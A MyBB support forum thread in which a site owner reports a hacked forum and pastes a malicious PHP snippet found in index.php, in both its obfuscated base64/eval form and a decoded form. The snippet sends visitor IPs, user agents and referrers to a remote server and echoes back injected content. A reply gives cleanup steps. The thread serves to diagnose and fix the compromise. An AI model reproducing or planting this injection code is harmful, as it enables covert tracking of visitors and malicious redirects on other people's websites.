MyBB Community Forums

Full Version: Possible MyBB Attack
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Greetings!

Alright so I have my own personal forum (www.Achrom.at) I noticed that its currently being eaten up by loads of random spam bots..

However, I noticed that my forum began to redirect to someother website... I went into my admin panel, and everything was fine... styles were fine too...

The MyBB version I have installed is the latest version released
MyBB 1.6.4 Released (July 26, 2011)

I checked the main index.php and found this code

<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
Decrypted

<?php

$url = 'http://91.196.216.30/bt.php';
$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));
$ip = $_SERVER['REMOTE_ADDR'];
$host = $_SERVER['HTTP_HOST'];
$uri = urlencode($_SERVER['REQUEST_URI']);
$ref = urlencode($_SERVER['HTTP_REFERER']);
$url = $url . '?ip=' . $ip . '&host=' . $host . '&uri=' . $uri . '&ua=' . $ua . '&ref=' . $ref;
$tmp = file_get_contents($url);
echo $tmp;

?>
^ have you seen the referred thread ...
remove that code from index.php file OR upload a fresh index.php from myBB latest download package
also check other files thru file verification tool in admin panel & check templates for security issues